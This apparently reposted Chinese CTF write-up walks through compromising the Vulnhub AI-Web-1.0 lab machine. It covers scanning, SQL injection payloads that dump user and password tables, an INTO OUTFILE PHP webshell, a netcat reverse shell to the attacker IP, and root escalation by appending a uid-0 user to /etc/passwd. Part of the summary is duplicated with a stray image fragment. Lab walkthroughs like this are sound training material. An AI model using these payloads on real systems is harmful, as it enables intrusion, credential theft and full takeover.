ICode9

精准搜索请尝试: 精确搜索
首页 > 其他分享> 文章详细

Vulnhub靶机:AI-Web-1.0

2022-01-20 22:33:19  阅读:218  来源: 互联网

标签:Web 1.0 提权 AI etc -- passwd hack select


1.信息收集

使用命令netdiscover寻找靶机IP,发现靶机IP为192.168.1.137。
img
使用nmap对把目标机进行端口扫描,发现只开启了80端口。
img
访问80端口,发现页面只有一句话,没什么可利用的信息。
img

使用 dirsearch -u http://192.168.1.137/对网站目录进行扫描。
img

2.漏洞探测与利用

尝试访问/server-status/目录,提示无权访问。访问robots.txt文件,出现两个目录。
img

依次访问这两个目录,提示无权访问。
img

那么尝试访问/se3reTdir777/目录,出现一个提交框。
img

搜集更多信息,扫描这两个目录下是否还有其他目录,结果扫描出m3diNf0目录下有info.php,访问该文件,发现是phpinfo探针,存在信息泄露。
img

2.1 SQL注入

猜测可能存在注入,显示正常,存在注入。
img

  • 判断数据库类型,为MySQL server。
    img

  • 判断列数,输入1' order by 3 -- -时,显示正确。换成order by 4,显示错误。所以这个数据库当前表的列数为3列。
    img

  • 爆破当前数据库名和用户

-1' union select 1,database(),user() -- -

img

  • 爆破当前数据库的表名,可以看到有两个表:user、systemUser。
-1' union select 1,table_name,3 from information_schema.columns where table_schema='aiweb1' -- -

img

  • 分别爆破user和sysytemUser表的列名。
-1' union select 1,column_name,3 from information_schema.columns where table_name='user' -- -

img

-1' union select 1,column_name,3 from information_schema.columns where table_name='systemUser' -- -

img

  • 爆破user表列名的内容。
-1' union select id,firstName,lastName from user -- -

img

爆破systemUser表的内容。

-1' union select id,userName,password from systemUser -- -

img

2.2 尝试into outfile 写shell

首先需要获知网站的绝对路径,在phpinfo探针中找到网站绝对路径。

img

尝试在文件上传目录/se3reTdir777/uploads中写入一句话木马。

-1' union select 1,2,'<?php @eval($_POST[123]);?>' into outfile "/home/www/html/web1x443290o2sdf92213/se3reTdir777/uploads/hack.php" -- -

img

使用蚁剑成功连接。

img

3.反弹shell

  • 在kali开启监听:nv -lvvp 6666

  • 在蚁剑终端上nc反弹:rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.1.128 6666 >/tmp/f

  • 成功反弹shell。

  • 为了方便,使用命令python -c 'import pty;pty.spawn("/bin/bash")'进入交互式shell。

img

img

4.提权

  • 查询/etc/passwd文件属性,发现当前用户拥有读写权限。

img

  • 那么尝试在/etc/passwd文件中添加一个root权限的用户进行提权。
  • 创建一个hack用户,使用openssl工具加密密码:
openssl passwd -1 -salt hack hack

img

  • 整理生成的密码,生成/etc/passwd文件格式的字符串:
hack:$1$hack$xR6zsfvpez/t8teGRRSNr.:0:0::/root:/bin/bash
  • 使用命令将生成的字符串添加到/etc/passwd文件中
echo 'hack:$1$hack$xR6zsfvpez/t8teGRRSNr.:0:0::/root:/bin/bash' >> etc/passwd

img

  • 登录用户,成功提权到root

img

5.总结归纳

  • 多目录扫描发现文件

  • SQL注入

  • 使用into outfile时,需要找到网站绝对路径,并且路径允许写入

  • echo命令写入一句话木马

  • Linux简单提权:修改/etc/passwd文件直接添加root身份的用户提权
    mg-7aySCe1g-1642688271712)]

5.总结归纳

  • 多目录扫描发现文件

  • SQL注入

  • 使用into outfile时,需要找到网站绝对路径,并且路径允许写入

  • echo命令写入一句话木马

  • Linux简单提权:修改/etc/passwd文件直接添加root身份的用户提权

  • openssl工具的使用

标签:Web,1.0,提权,AI,etc,--,passwd,hack,select
来源: https://blog.csdn.net/Aydn115/article/details/122611351

本站声明: 1. iCode9 技术分享网(下文简称本站)提供的所有内容,仅供技术学习、探讨和分享;
2. 关于本站的所有留言、评论、转载及引用,纯属内容发起人的个人观点,与本站观点和立场无关;
3. 关于本站的所有言论和文字,纯属内容发起人的个人观点,与本站观点和立场无关;
4. 本站文章均是网友提供,不完全保证技术分享内容的完整性、准确性、时效性、风险性和版权归属;如您发现该文章侵犯了您的权益,可联系我们第一时间进行删除;
5. 本站为非盈利性的个人网站,所有内容不会用来进行牟利,也不会利用任何形式的广告来间接获益,纯粹是为了广大技术爱好者提供技术内容和技术思想的分享性交流网站。

专注分享技术,共同学习,共同进步。侵权联系[81616952@qq.com]

Copyright (C)ICode9.com, All Rights Reserved.

ICode9版权所有